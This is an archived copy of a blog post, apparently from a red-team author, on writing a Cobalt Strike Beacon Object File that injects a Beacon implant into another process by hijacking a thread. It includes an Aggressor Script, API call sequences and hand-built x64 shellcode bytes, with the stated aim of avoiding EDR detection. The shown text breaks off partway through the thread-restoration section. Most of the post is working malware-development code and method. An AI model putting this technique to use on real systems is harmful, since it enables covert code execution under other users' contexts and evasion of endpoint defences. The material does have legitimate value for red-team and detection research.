{
	"id": "52178d8e-525c-4fc9-a022-cffb9ec723e7",
	"created_at": "2026-04-10T03:22:03.35565Z",
	"updated_at": "2026-04-10T03:22:19.731704Z",
	"deleted_at": null,
	"sha1_hash": "22a337a7e2a698b3935b38a27b5fe1eeac6b1f7f",
	"title": "Malware Development: Leveraging Beacon Object Files for Remote Process Injection via Thread Hijacking",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 1229078,
	"plain_text": "Malware Development: Leveraging Beacon Object Files for\r\nRemote Process Injection via Thread Hijacking\r\nBy Connor McGarr\r\nPublished: 2021-01-09 · Archived: 2026-04-10 02:43:13 UTC\r\nIntroduction\r\nAs people I have interacted with will attest, my favorite subject in the entire world is binary exploitation. I love\r\neverything about it, from the problem solving aspects to the OS internals, assembly, and C side of the house. I also\r\nenjoy pushing my limits in order to find new and creative solutions for exploitation. In addition to my affinity for\r\nexploitation, I also love to red team. After all, this is what I do on a day to day basis. While I love to work my way\r\naround enterprise networks, I find myself really enjoying the host-based avoidance aspects of red teaming. I find it\r\nincredibly fun and challenging to use some of my prerequisite knowledge on exploitation and Windows internals\r\nin order to bypass security products and stay undetected (well, try to anyways). With Cobalt Strike, a very popular\r\nremote access tool (RAT), being so widely adopted by red teams - I thought I would investigate deeper into a\r\nnewer Cobalt Strike capability, Beacon Object Files, which allow operators to write post-exploitation capabilities\r\nin C (which makes me incredibly happy as a person). This blog will go over a technique known as thread\r\nhijacking and integrating it into a usable Beacon Object File.\r\nHowever, before beginning, I would like to delineate this post will be focused on the technique of remote process\r\ninjection, thread hijacking, and thread restoration - not so much on Beacon Object Files themselves. Beacon\r\nObject Files, for our purposes, are a means to an end, as this technique can be deployed in many other fashions. As\r\nwas aforementioned, Cobalt Strike is widely adopted and I think it is a great tool and I am a big proponent of it. I\r\nstill believe at the end of the day, however, it is more important to understand the overarching concept surrounding\r\na TTP (Tactic, Technique, and Procedure), versus learning how to just arbitrarily run a tool, which in turn will\r\ncreate a bottleneck in your red teaming methodology by relying on a tool itself. If Cobalt Strike went away\r\ntomorrow, that shouldn’t render this TTP, or any other TTPs, useless. However, almost contradictory, this first\r\nportion of this post will briefly outline what Beacon Object Files are, a quick recap on remote process injection,\r\nand a bit on writing code that adheres to the needs of Beacon Object Files.\r\nLastly, the final project can be found here.\r\nBeacon Object Files - You have two minutes, go.\r\nBack in June, I saw a very interesting blog post from Cobalt Strike that outlined a new Beacon capability, known\r\nas Beacon Object Files. Beacon Object Files, stylized as BOFs, are essentially compiled C programs that are\r\nexecuted as position-independent code within Beacon. You bring the object file and Cobalt Strike supplies the\r\nlinking. Raphael Mudge, the creator of Cobalt Strike, has a YouTube video that goes over the intrinsics,\r\ncapabilities, and limitations of BOFs. I highly recommend you check out this video. In addition, I encourage you\r\nhttps://connormcgarr.github.io/thread-hijacking/\r\nPage 1 of 37\n\nto check out TrustedSec’s BOF blog and project to supplement the available Cobalt Strike documentation for BOF\r\ndevelopment.\r\nOne thing to note before moving on is that BOFs are intended to be “lightweight” tools. Lightweight may be\r\nsubjective, but as Raphael points out in his video and blog, the main benefit of BOFs are twofold:\r\n1. BOFs do not spawn a temporary “sacrificial” process to perform post-exploitation work - they’re directly\r\nexecuted as position-independent code within the current Beacon process, increasing overall OPSEC\r\n(operational security).\r\n2. BOFs are really meant to interact with the Windows API and the internal Beacon API, as BOFs expose a\r\nset of functions operators can use when developing. This means BOFs are smaller in size and easily allow\r\nyou to invoke Window APIs and interact with the internal Beacon API.\r\nAdditionally, there are a few drawbacks to BOFs:\r\n1. Cobalt Strike is the linker for BOFs - meaning libc style functions like strlen will not resolve. To\r\ncompensate for this, however, you can use BOF compliant decorators in your function prototypes with the\r\nMSVCRT (Microsoft C Run-time) library and grab such functions from there. Declaring and using such\r\nfunctions with BOFs will be outlined in the latter portions of this post. Additionally, from Raphael’s CVE-2020-0796 BOF, there are ways to define your own C-style functions.\r\n2. BOFs are executed within the current Beacon process - meaning that if your BOF encounters some kind of\r\ninternal error and fails, your Beacon process will crash as well. This means BOFs should be carefully\r\nvetted and tested across multiple systems, networks, and environments, while also implementing host-based checks for version information, using properly documented data types and structures outlined in a\r\nfunction’s prototype, and cleaning up any opened handles, allocated memory, etc.\r\nNow that that’s out of the way, let’s get into a bit of background on remote process injection and thread hijacking,\r\nas well as outline our BOF’s execution flow.\r\nRemote process injection, for the unfamiliar, is a technique in which an operator can inject code into another\r\nprocess on a machine, under certain circumstances. This is most commonly done with a chain of Windows APIs\r\nbeing called in order to allocate some memory in the other process, write user-defined memory (usually a\r\nshellcode of some sort) to that allocation, and kicking off execution by create a thread within the remote process.\r\nThe APIs, VirtualAllocEx , WriteProcessMemory , and CreateRemoteThread are often popular choices,\r\nrespectively.\r\nWhy is remote process injection important? Take a look at the image below, which is a listing of processes\r\nperformed inside of a Cobalt Strike Beacon implant.\r\nhttps://connormcgarr.github.io/thread-hijacking/\r\nPage 2 of 37\n\nAs is seen above, Cobalt Strike not only discloses to the operator what processes are running, but also under what\r\nuser context a certain process is running under. This could be very useful on a penetration test in an Active\r\nDirectory environment where the goal is to obtain domain administrative access. Let’s say you as an operator\r\nobtain access to a server where there are many users logged in, including a user with domain administrative\r\naccess. This means that there is a great likelihood there will be processes running in context of this high-value\r\nuser. This concept can be seen below where a second process listing is performed where another user,\r\nANOTHERUSER has a PowerShell.exe process running on the host.\r\nUsing Cobalt Strike’s built-in inject capability, a raw Beacon implant can be injected into the PowerShell.exe\r\nprocess utilizing the remote injection technique outlined in the Cobalt Strike Malleable C2 profile, resulting in a\r\nsecond callback, in context of the ANOTHERUSER user, using the PID of the PowerShell.exe instance, process\r\narchitecture (64-bit), and the name of the Cobalt Strike listener as arguments.\r\nAfter the injection, there is a successful callback, resulting in a valid session in context of the OTHERUSER user.\r\nhttps://connormcgarr.github.io/thread-hijacking/\r\nPage 3 of 37\n\nThis is useful to a red team operator, as the credentials for the OTHERUSER were not needed in order to obtain\r\naccess in context of said user. However, there are a few drawbacks - including the addition of endpoint detection\r\nand response (EDR) products that detect on such behavior. One of the indicators of compromise (IOC) would be,\r\nin this instance, a remote thread being created in a remote process. There are more IOCs for this TTP, but this blog\r\nwill focus on circumventing the need to create a remote thread. Instead, let’s examine thread hijacking, a\r\ntechnique in which an already existing thread within the target process is suspended and manipulated in order to\r\nexecute shellcode.\r\nThread Hijacking and Thread Restoration\r\nAs mentioned earlier, the process for a typical remote injection is:\r\n1. Allocate a memory region within the target process using VirtualAllocEx . A handle to the target process\r\nmust already be existing with an access right of at least PROCESS_VM_OPERATION in order to leverage this\r\nAPI successfully. This handle can be obtained using the Windows API function OpenProcess .\r\n2. Write your code to the allocated region using WriteProcessMemory . A handle to the target process must\r\nalready be existing with an access right of at least PROCESS_WRITE and the previously mentioned\r\nPROCESS_VM_OPERATION - meaning a handle to the remote process must have both of these access rights at\r\nminimum to perform remote injection.\r\n3. Create a remote thread, within the remote process, to execute the shellcode, using CreateRemoteThread .\r\nOur thread hijacking technique will utilize the first two members of the previous list, but instead of\r\nCreateRemoteThread , our workflow will consist of the following:\r\n1. Open a handle to the remote process using the aforementioned access rights required by VirtualAllocEx\r\nand WriteProcessMemory .\r\n2. Loop through the threads on the machine utilizing the Windows API CreateToolhelp32Snapshot . This\r\nloop will contain logic to break upon identifying the first thread within the target process.\r\n3. Upon breaking the loop, open a handle to the target thread using the Windows API function OpenThread .\r\n4. Call SuspendThread , passing the former thread handle mentioned as the argument. SuspendThread\r\nrequires the handle has an access right of THREAD_SUSPEND_RESUME .\r\n5. Call GetThreadContext , using the thread handle. This function requires that handles have a\r\nTHREAD_GET_CONTEXT access right. This function will dump the current state of the target thread’s CPU\r\nregisters, processor flags, and other CPU information into a CONTEXT record. This is because each thread\r\nhas its own stack, CPU registers, etc. This information will be later used to execute our shellcode and to\r\nrestore the thread once execution has completed.\r\n6. Inject the shellcode into the desired process using VirtualAllocEx and WriteProcessMemory . The\r\nshellcode that will be used in this blog will be the default Cobalt Strike payload, which is a reflective DLL.\r\nThis payload will be dynamically generated with a user-specified listener that exists already, using a Cobalt\r\nhttps://connormcgarr.github.io/thread-hijacking/\r\nPage 4 of 37\n\nStrike Aggressor Script. Creation of the Aggressor Script will follow in the latter portions of this blog post.\r\nThe Beacon implant won’t be executed quite yet, it will just be sitting within the target remote process, for\r\nthe time being.\r\n7. Since Cobalt Strike’s default stageless payload is a reflective DLL, it works a bit differently than traditional\r\nshellcode. Because it is a reflective DLL, when the DllMain function is called to kick off Beacon, the\r\nshellcode never performs a “return”, because Beacon calls either ExitThread or ExitProcess to leave\r\nDllMain , depending on what is specified in the payload by the operator. Because of this, it would not be\r\npossible to restore the hijacked thread, as the thread will run the DllMain function until the operator exits\r\nthe Beacon, since the stageless raw Beacon artifact does not perform a “return”. Due to this, we must create\r\na shellcode that our Beacon implant will be wrapped in, with a custom CreateThread routine that creates\r\na local thread within the remote process for the Beacon implant to run. Essentially, this is one of three\r\ncomponents our “new” full payload will “carry”, so when execution reaches the remote process, the call to\r\nCreaeteThread , which creates a local thread, will allocate the thread in the remote process for Beacon to\r\nrun in. This means that the hijacked thread will never actually execute the Beacon implant, it will actually\r\nexecute a small shellcode, made up of three components, that places the Beacon implant into its own local\r\nthread, along with a two other routines that will be described here shortly. Up until this point, no code has\r\nbeen executed and everything mentioned is just a synopsis of each component’s purpose.\r\n8. The custom CreateThread routine is actually executed by being called from another routine that will be\r\nwrapped into our final payload, which is a routine for a call to NtContinue . This is the second component\r\nof our custom shellcode. After the CreateThread routine is finished executing, it will perform a return\r\nback into the NtContinue routine. After the hijacked thread executes the CreateThread routine, the\r\nthread needs to be restored with the original CPU registers, flags, etc. it had before the thread hijack\r\noccurred. NtContinue will be talked about in the latter portions of this post, but for now just know that\r\nNtContinue , at a high level, is a function in ntdll.dll that accepts a pointer to a CONTEXT record and\r\nsets the calling thread to that context. Again, no code has been executed so far. The only thing that has\r\nchanged is our large “final payload” has added another component to it, NtContinue .\r\n9. The CreateThread routine is first prepended with a stack alignment routine, which performs bitwise AND\r\nwith the stack pointer, to ensure a 16-byte alignment. Some function calls fail if they are not 16-byte\r\naligned, and this ensures when the shellcode performs a call to the CreateThread routine, it is first 16-\r\nbyte aligned. malloc is then invoked to create one giant buffer that all of these “moving parts” are added\r\nto.\r\n10. Now that there is one contiguous buffer for the final payload, using VirtualAllocEx and\r\nWriteProcessMemory , again, the final payload, consisting of the three routines, is injected into the remote\r\nprocess.\r\n11. Lastly, the previously captured CONTEXT record is updated to point the DWORD.Rip member, which\r\nrepresents the value of the 64-bit instruction pointer, to the address of our full payload.\r\n12. SetThreadContext is then called, which forces the target thread to be updated to point to the final\r\npayload, and ResumeThread is used to queue our shellcode execution, by resuming the hijacked thread.\r\nBefore moving on, there are two things I would like to call out. The first is the call to CreateThread . At first\r\nglance, this may seem like it is not a viable alternative to CreateRemoteThread directly. The benefit of the thread\r\nhijacking technique is that even though a thread is created, it is not created from a remote process, it is created\r\nlocally. This does a few things, including avoiding the common API call chain of VirtualAllocEx ,\r\nhttps://connormcgarr.github.io/thread-hijacking/\r\nPage 5 of 37\n\nWriteProcessMemory , and CreateRemoteThread and secondly, by blending in (a bit more) by calling\r\nCreateThread , which is a less scrutinized API call. There are other IOCs to detect this technique. However, I will\r\nleave that as an exercise to the reader :-).\r\nLet’s move on and start with come code.\r\nVisual Studio + Beacon Object File Intrinsics\r\nFor this project, I will be using Visual Studio and the MSVC Compiler, cl.exe . Feel free to use mingw , as it\r\ncan also produce BOFs. Let’s go over a few house rules for BOFs before we begin.\r\nIn order to compile a BOF on Visual Studio, open an x64 Native Tools Command Prompt for VS session and use\r\nthe following command: cl /c /GS- INPUT.c /FoOUTPUT.o . This will compile the C program as an object file\r\nonly and will not implement stack cookies, due to the Cobalt Strike linker obviously not being able to locate the\r\ninjected stack cookie check functions.\r\nIf you would like to call a Windows API function, BOFs require a __declspec(dllimport) keyword, which is\r\ndefined in winnt.h as DECLSPEC_IMPORT . This indicates to the compiler that this function is found within a\r\nDLL, telling the compiler essentially “this function will be resolved later” and as mentioned before, since Cobalt\r\nStrike is the linker, this is needed to tell the compiler to let the linking come later. Since the linking will come\r\nlater, this also means a full function prototype must be supplied to the BOF. You can use Visual Studio to “peek”\r\nthe prototype of a Windows API function. This will suffice in attributing the __declspec(dllimport) keyword to\r\nour function prototypes, as the prototypes of most Windows API functions contain a #define directive with a\r\ndefinition of WINBASEAPI , or similar, which already contains a __declspec(dllimport) keyword. An example\r\nwould be the prototype of the function GetProcAddress , as seen below.\r\nThis reveals the __declspec(dllimport) keyword will be present when this BOF is compiled.\r\nArmed with this information, if an operator wanted to include the function GetProcAddress in their BOF, it\r\nwould be outlined as such:\r\nWINBASEAPI FARPROC WINAPI KERNEL32$GetProcAddress(HMODULE, LPCSTR);\r\nThe value directly before the $ represents the library the function is found in. The relocation table of the object\r\nfile, which essentially contains pointers to the list of items the object file needs addresses from, like functions\r\nother libraries or object files, will point to the prototyped LIB$Function functions memory address. Cobalt\r\nStrike, acting as the linker and loader, will parse this table and update the relocation table of the object file, where\r\nhttps://connormcgarr.github.io/thread-hijacking/\r\nPage 6 of 37\n\napplicable, with the actual addresses of the user-defined Windows API functions, such as GetProcAddress in the\r\nabove test case. This blob is then passed to Beacon as a code to be executed. Not reinventing the wheel here,\r\nRaphael outlines this all in his wonderful video.\r\nIn addition to this, I will hit on one last thing - and that is user-supplied arguments and returning output back to the\r\noperator. Beacon exposes an internal API to BOFs, that are outlined in the beacon.h header file, supplied by\r\nCobalt Strike. For returning output back to the operator, the API BeaconPrintf is exposed, and can return output\r\nover Beacon. This API accepts a user-supplied string, as well as #define directive in beacon.h , namely\r\nCALLBACK_OUTPUT and CALLBACK_ERROR . For instance, updating the operator with a message would be\r\nimplemented as such:\r\nBeaconPrintf(CALLBACK_OUTPUT, \"[+] Hello World!\\n\");\r\nFor accepting user supplied arguments, you’ll need to implement an Aggressor Script into your project. The\r\nfollowing will be the script used for this post.\r\n# Setup cThreadHijack\r\nalias cThreadHijack {\r\n # Alias for Beacon ID and args\r\n local('$bid $listener $pid $payload');\r\n \r\n # Set the number of arguments\r\n ($bid, $pid, $listener) = @_;\r\n # Determine the amount of arguments\r\n if (size(@_) != 3)\r\n {\r\n berror($bid, \"Error! Please enter a valid listener and PID\");\r\n return;\r\n }\r\n # Read in the BOF\r\n $handle = openf(script_resource(\"cThreadHijack.o\"));\r\n $data = readb($handle, -1);\r\n closef($handle);\r\n # Verify PID is an integer\r\n if ((!-isnumber $pid) || (int($pid) \u003c= 0))\r\n {\r\n berror($bid, \"Please enter a valid PID!\\n\");\r\n return;\r\n }\r\n # Generate a new payload\r\nhttps://connormcgarr.github.io/thread-hijacking/\r\nPage 7 of 37\n\n$payload = payload_local($bid, $listener, \"x64\", \"thread\");\r\n $handle1 = openf(\"\u003eout.bin\");\r\n writeb($handle1, $data1);\r\n closef($handle1);\r\n \r\n # Pack the arguments\r\n # 'b' is binary data and 'i' is an integer\r\n $args = bof_pack($bid, \"ib\", $pid, $payload);\r\n # Run the BOF\r\n # go = Entry point of the BOF\r\n beacon_inline_execute($bid, $data, \"go\", $args);\r\n}\r\nThe goal is to be able to supply our BOF to Cobalt Strike, with the very original name cThreadHijack , a PID for\r\ninjection and the name of the Cobalt Strike listener. The first local statement sets up our variables, which\r\ninclude the ID of the Beacon executing the BOF, listener name, the PID, and payload, which will be generated\r\nlater. The @_ statement sets an array with the order our arguments will be supplied to the BOF, mean the\r\ncommand to use this BOF would be cThreadHijack \"Name of listener\" PID . After, error checking is done to\r\ndetermine if 3 arguments have been supplied (two for the PID and listener and the Beacon ID, the third argument,\r\nwill be supplied to the BOF without us needing to input anything). After the object file is read in and the PID is\r\nverified, the Aggressor function payload_local is used to generate a raw Cobalt Strike payload with the user-supplied listener name and an exit method. After this, the user-supplied argument $pid is packed as an integer\r\nand the newly created $payload variable is packed as a binary value. Then, upon execution in Cobalt Strike, the\r\nalias cThreadHijacked is executed with the aforementioned arguments, using the function go as the main entry\r\npoint. This script must be loaded before executing the BOF.\r\nFrom the C code side, this is how it looks to set these arguments and define the functions needed for thread\r\nhijacking.\r\nhttps://connormcgarr.github.io/thread-hijacking/\r\nPage 8 of 37\n\nThe function BeaconDataParse is first used, with a special datap structure, to obtain the user-supplied\r\narguments. Then, the value int pid is set to the user-supplied PID, while the char* shellcode value is set to\r\nthe Beacon implant, meaning everything is in place. Finally, now that details on adhering to BOF’s rules while\r\nwriting C is out of the way, let’s get into the code.\r\nOpen, Enumerate, Suspend, Get, Inject, and Get Out!\r\nThe first step in thread hijacking is to first open a handle to the target process. As mentioned before, calls that\r\nutilize this handle, VirtualAllocEx and WriteProcessMemory , must have a total access right of\r\nPROCESS_VM_OPERATION and PROCESS_VM_WRITE . This can be correlated to the following code.\r\nhttps://connormcgarr.github.io/thread-hijacking/\r\nPage 9 of 37\n\nThis function accepts the user-supplied argument for a PID and returns a handle to it. After the process handle is\r\nopened, the BOF starts enumerating threads using the API CreateToolhelp32Snapshot . This routine is sent\r\nthrough a loop and “breaks” upon the first thread of the target PID being reached. When this happens, a call to\r\nOpenThread with the rights THREAD_SUSPEND_RESUME , THREAD_SET_CONTEXT , and THREAD_GET_CONTEXT occurs.\r\nThis allows the program to suspend the thread, obtain the thread’s context, and set the thread’s context.\r\nAt this point, the goal is to suspend the identified thread, in order to obtain its current CONTEXT record and later\r\nset its context again.\r\nhttps://connormcgarr.github.io/thread-hijacking/\r\nPage 10 of 37\n\nOnce the thread has been suspended, the Beacon implant is remotely injected into the target process. This will not\r\nbe the final payload the hijacked thread will execute, this is simply to inject the Beacon implant into the remote\r\nprocess in order to use this address later on in the CreateThread routine.\r\nNow that the remote thread is suspended and our Beacon implant shellcode is sitting within the remote process\r\naddress space, it is time to implement a BYTE array that places the Beacon implant in a thread and executes it.\r\nBeacon - Stay Put!\r\nAs previously mentioned, the first goal will be to place the already injected Beacon implant into its own thread.\r\nCurrently, the implant is just sitting within the desired remote process and has not executed. To do this, we will\r\ncreate a 64-byte BYTE array that will contain the necessary opcodes to perform this task. Let’s take a look at the\r\nCreateThread function prototype.\r\nhttps://connormcgarr.github.io/thread-hijacking/\r\nPage 11 of 37\n\nHANDLE CreateThread(\r\n LPSECURITY_ATTRIBUTES lpThreadAttributes,\r\n SIZE_T dwStackSize,\r\n LPTHREAD_START_ROUTINE lpStartAddress,\r\n __drv_aliasesMem LPVOID lpParameter,\r\n DWORD dwCreationFlags,\r\n LPDWORD lpThreadId\r\n);\r\nAs mentioned by Microsoft documentation, this function will create a thread to execute within the virtual address\r\nspace of the calling function. Since we will be injecting this routine into the remote process, when the routine\r\nexecuted, it will create a thread within the remote process. This is beneficial to us, as CreateThread creates a\r\nlocal thread - but since the routine will be executed inside of the remote process, it will spawn a local thread,\r\ninstead of requiring us to create a thread, remotely, from our current process.\r\nThe function argument we will be worried about is LPTHREAD_START_ROUTINE , which is really just a function\r\npointer to whatever the thread will execute. In our case, this will be the address of our previously injected Beacon\r\nimplant. We already have this address, as VirtualAllocEx has a return value of type LPVOID , which is a pointer\r\nto our shellcode. Let’s get into the development of the routine.\r\nThe first step is to declare a BYTE array of 64-bytes. 64-bytes was chosen, as it is divisible by a QWORD, which\r\nis a 64-bit address. This is to ensure proper alignment, meaning 8 QWORDS will be used for this routine - which\r\nkeeps everything nice and aligned. Additionally, we will declare an integer variable to use as a “counter” in order\r\nto make sure we are placing our opcodes at the correct index within the BYTE array.\r\nBYTE createThread[64] = { NULL };\r\nint z = 0;\r\nSince we are working on a 64-bit system, we must adhere to the __fastcall calling convention. This calling\r\nconvention requires the first four integer arguments (floating-point values are passed in different registers) are\r\npassed in the RCX , RDX , R8 , and R9 registers, respectively. However, the question remains - CreateThread\r\nhas a total of six parameters, what do we do with the last two? With __fastcall , the fifth and subsequent\r\nparameters are located on the stack at an offset of 0x20 and every 0x8 bytes subsequently. This means, for our\r\npurposes, the fifth parameter will be located at RSP + 0x20 and the sixth will be located at RSP + 0x28 . Here\r\nare the parameters used for our purposes.\r\n1. lpThreadAttributes will be set to NULL . Setting this value to NULL will ensure the thread handle isn’t\r\ninherited by child processes.\r\n2. dwStackSize will be set to 0. Setting this parameter to 0 forces the thread to inherit the default stack size\r\nfor the executable, which is fine for our purposes.\r\n3. lpStartAddress , as previously mentioned, will be the address of our shellcode. This parameter is a\r\nfunction pointer to be executed by the thread.\r\n4. lpParameter will be set to NULL , as our thread does not need to inherit any variables.\r\nhttps://connormcgarr.github.io/thread-hijacking/\r\nPage 12 of 37\n\n5. dwCreationFlags will be set to 0, which informs the thread we would like to thread to run immediately\r\nafter it is created. This will kick off our Beacon implant, after thread creation.\r\n6. lpThreadId will be set to NULL , which is of less importance to us - as this will not return a thread ID to\r\nthe LPDWORD pointer parameter. Essentially, we could have passed a legitimate pointer to a DWORD and it\r\nwould have been dynamically filled with the thread ID. However, this is not important for purpose of this\r\npost.\r\nThe first step is to place a value of NULL , or 0, into the RCX register, for the lpThreadAttributes argument. To\r\ndo this, we can use bitwise XOR.\r\n// xor rcx, rcx\r\ncreateThread[z++] = 0x48;\r\ncreateThread[z++] = 0x31;\r\ncreateThread[z++] = 0xc9;\r\nThis performs bitwise XOR with the same two values (RCX), which results in 0 as bitwise XOR with two of the\r\nsame values results in 0. The result is then placed in the RCX register. Synonymously, we can leverage the same\r\nproperty of XOR for the second parameter, dwStackSize , which is also 0.\r\n// xor rdx, rdx\r\ncreateThread[z++] = 0x48;\r\ncreateThread[z++] = 0x31;\r\ncreateThread[z++] = 0xd2;\r\nThe next step, is really the only parameter we need to specify a specific value for, which is lpStartAddress .\r\nBefore supplying this parameter, let’s take a quick look back at our first injection, which planted the Beacon\r\nimplant into the desired remote process.\r\nhttps://connormcgarr.github.io/thread-hijacking/\r\nPage 13 of 37\n\nThe above code returns the virtual memory address of our allocation into the variable placeRemotely . As can be\r\nseen, this return value is of the data type LPVOID , while the lpStartParameter argument takes a data type of\r\nLPTHREAD_START_ROUTINE , which is pretty similar with LPVOID . However, for continuity sake, we will first type\r\ncast this allocation into an LPTHREAD_START_ROUTINE function pointer.\r\n// Casting shellcode address to LPTHREAD_START_ROUTINE function pointer\r\nLPTHREAD_START_ROUTINE threadCast = (LPTHREAD_START_ROUTINE)placeRemotely;\r\nIn order to place this value into the BYTE array, we will need to use a function that can copy this address to the\r\nbuffer, as the BYTE array will only accept one byte at a time. There is a limitation however, as BOFs do not link\r\nC-Runtime functions such as memcpy . We can overcome this by creating our own custom memcpy routine, or\r\ngrabbing one from the MSVCRT library, which Cobalt Strike can link to us. However, for now and for awareness\r\nof others, we will leverage a libc.h header file that Raphael created, which can be found here.\r\nhttps://connormcgarr.github.io/thread-hijacking/\r\nPage 14 of 37\n\nUsing the custom mycopy function, we can now perform a mov r8, LPTHREAD_START_ROUTINE instruction.\r\n// mov r8, LPTHREAD_START_ROUTINE\r\ncreateThread[z++] = 0x49;\r\ncreateThread[z++] = 0xb8;\r\nmycopy(createThread + z, \u0026threadCast, sizeof(threadCast));\r\nz += sizeof(threadCast);\r\nNotice how the end of this small shellcode blob contains an update for the array index counter z , to ensure as the\r\narray is written to at the correct index. We have the luxury of using a mov r8, LPTHREAD_START_ROUTINE , as our\r\nshellcode pointer has already been mapped into the remote process. This will allow the CreateThread routine to\r\nfind this function pointer, in memory, as it is available within the remote process address space. We must\r\nremember that each process on Windows has its own private virtual address space, meaning memory in one user\r\nmode process isn’t visible to another user mode process. As we will see with the NtContinue stub coming up, we\r\nwill actually have to embed the preserved CONTEXT record of the hijacked thread into the payload itself, as the\r\nstructure is located in the current process, while the code will be executing within the desired remote process.\r\nhttps://connormcgarr.github.io/thread-hijacking/\r\nPage 15 of 37\n\nNow that the lpStartAddress parameter has been completed, lpParameter must be set to NULL . Again, this\r\ncan be done by utilizing bitwise XOR.\r\n// xor r9, r9\r\ncreateThread[z++] = 0x4d;\r\ncreateThread[z++] = 0x31;\r\ncreateThread[z++] = 0xc9;\r\nThe last two parameters, dwCreationFlags and lpThreadId will be located at an offset of 0x20 and 0x28 ,\r\nrespectively, from RSP. Since R9 already contains a value of 0, and since both parameters need a value of 0, we\r\ncan use to mov instructions, as such.\r\n// mov [rsp+20h], r9 (which already contains 0)\r\ncreateThread[z++] = 0x4c;\r\ncreateThread[z++] = 0x89;\r\ncreateThread[z++] = 0x4c;\r\ncreateThread[z++] = 0x24;\r\ncreateThread[z++] = 0x20;\r\n// mov [rsp+28h], r9 (which already contains 0)\r\ncreateThread[z++] = 0x4c;\r\ncreateThread[z++] = 0x89;\r\ncreateThread[z++] = 0x4c;\r\ncreateThread[z++] = 0x24;\r\ncreateThread[z++] = 0x28;\r\nA quick note - notice that the brackets surrounding each [rsp+OFFSET] operand indicate we would like to\r\noverwrite what that value is pointing to.\r\nThe next goal is to resolve the address of CreateThread . Even though we will be resolving this address within\r\nthe BOF, meaning it will be resolved within the current process, not the desired remote process, the address of\r\nCreateThread will be the same across processes, although each user mode process is mapped its own view of\r\nkernel32.dll . To resolve this address, we will use the following routine, with BOF denotations in our code.\r\n// Resolve the address of CreateThread\r\nunsigned long long createthreadAddress = KERNEL32$GetProcAddress(KERNEL32$GetModuleHandleA(\"kernel32\"), \"CreateT\r\n// Error handling\r\nif (createthreadAddress == NULL)\r\n{\r\n BeaconPrintf(CALLBACK_ERROR, \"Error! Unable to resolve CreateThread. Error: 0x%lx\\n\", KERNEL32$GetLastError())\r\n}\r\nhttps://connormcgarr.github.io/thread-hijacking/\r\nPage 16 of 37\n\nThe unsigned long long variable createthreadAddress will be filled with the address of CreateThread .\r\nunsigned long long is a 64-bit value, which is the size of a memory address on a 64-bit system. Although\r\nKERNEL32$GetProcAddress has a prototype with a return value of FARPROC , we need the address to actually be of\r\nthe type unsigned long long , DWORD64 , or similar, to allow us to properly copy this address into the routine\r\nwith mycopy . The next goal is to move the address of CreateThread into RAX. After this, we will perform a\r\ncall rax instruction, which will kick off the routine. This can be seen below.\r\n// mov rax, CreateThread\r\ncreateThread[z++] = 0x48;\r\ncreateThread[z++] = 0xb8;\r\nmycopy(createThread + z, \u0026createthreadAddress, sizeof(createthreadAddress));\r\nz += sizeof(createthreadAddress);\r\n// call rax (call CreateThread)\r\ncreateThread[z++] = 0xff;\r\ncreateThread[z++] = 0xd0;\r\nAdditionally, we want to add a ret opcode. The way our full payload will be setup is as follows:\r\n1. A call to the stack alignment/ CreateThread routine will be made firstly (the stack alignment routine will\r\nbe hit on in a latter portion of this blog). When a call instruction is executed, it pushes a return address\r\nonto the stack. This is the address that ret will jump to in order to continue execution of the payload.\r\nWhen the stack alignment/ CreateThread routine is called, it will push a return address onto the stack.\r\nThis return address will actually be the address of the NtContinue routine.\r\n2. We want to end our stack alignment/ CreateThread routine with a ret instruction. This ret will force\r\nexecution back to the NtContinue routine. This will all be outlined when executed is examined inside of\r\nWinDbg.\r\n3. The call to the stack alignment/ CreateThread routine is actually going to be a part of the NtContinue\r\nroutine. The first instruction in the NtContinue routine will be a call to the stack\r\nalignment/ CreateThread shellcode, which will then perform a ret back to the NtContinue routine,\r\nwhere thread execution will be restored. Here is a quick visual.\r\nPAYLOAD = NtContinue shellcode calls stack alignment/CreateThread shellcode -\u003e stack\r\nalignment/CreateThread shellcode executes, placing Beacon in its own local thread. This shellcode\r\nperforms a return back to the NtContinue shellcode -\u003e NtContinue shellcode finishes executing, which\r\nrestores the thread\r\nIn accordance with out plan, let’s end the CreateThread routine with a 0xc3 opcode, which is a return\r\ninstruction.\r\n// Return to the caller in order to kick off NtContinue routine\r\ncreateThread[z++] = 0xc3;\r\nhttps://connormcgarr.github.io/thread-hijacking/\r\nPage 17 of 37\n\nLet’s continue by developing a NtContinue shellcode routine. After that, we will develop a stack alignment\r\nshellcode in order to ensure the stack pointer is 16-byte aligned, when the first call occurs in our final payload.\r\nOnce we have completed both of these routines, we will walk through the entire shellcode inside of the debugger.\r\n“Never in the Field of Human Conflict, Was So Much Owed, by So Many, to\r\nNtContinue ”\r\nUp until now, we have achieved the following:\r\n1. Our shellcode has been injected into the remote process.\r\n2. We have identified a remote thread, which we will later manipulate to execute our Beacon implant\r\n3. We have created a routine that will place the Beacon implant in its own local thread, within the remote\r\nprocess, upon execution\r\nThis is great, and we are almost home free. The issue remains, however, the topic of thread restoration. After all,\r\nwe are taking a thread, which was performing some sort of action before, unbeknownst to us, and forcing it to do\r\nsomething else. This will certainly result in execution of our shellcode, however, it will also present some\r\nunintended consequences. Upon executing our shellcode, the thread’s CPU registers, along with other information,\r\nwill be out of context from the actions it was performing before execution. This will cause the the process housing\r\nthis thread, the desired remote process we are injecting into, to most likely crash. To avoid this, we can utilize an\r\nundocumented ntdll.dll function, NtContinue . As pointed out in Alex Ionescu and Yarden Shafir’s R.I.P\r\nROP: CET Internals in Windows 20H1 blog post, NtContinue is used to resume execution after an exception or\r\ninterrupt. This is perfect for our use case, as we can abuse this functionality. Since our thread will be mangled,\r\ncalling this function with the preserved CONTEXT record from earlier will restore execution properly.\r\nNtContinue accepts a pointer to a CONTEXT record, and a parameter that allows a programmer to set if the\r\nAlerted state should be removed from the thread, as outlined in its function prototype. We need not worry about\r\nthe second parameter for our purposes, as we will set this parameter to FALSE . However, there remains the issue\r\nof the first parameter, PCONTEXT .\r\nAs you can recall in the former portion of this blog post, we first preserved the CONTEXT record for our hijacked\r\nthread, within our BOF code. The issue we have, however, is that this CONTEXT record is sitting within the current\r\nprocess, while our shellcode will be executed within the desired remote process. Because of the fact each user\r\nmode process has its own private address space, this CONTEXT record’s address is not visible to the remote\r\nprocess we are injecting into. Additionally, since NtContinue does not accept a HANDLE parameter, it expects\r\nthe thread it will resume execution for is the 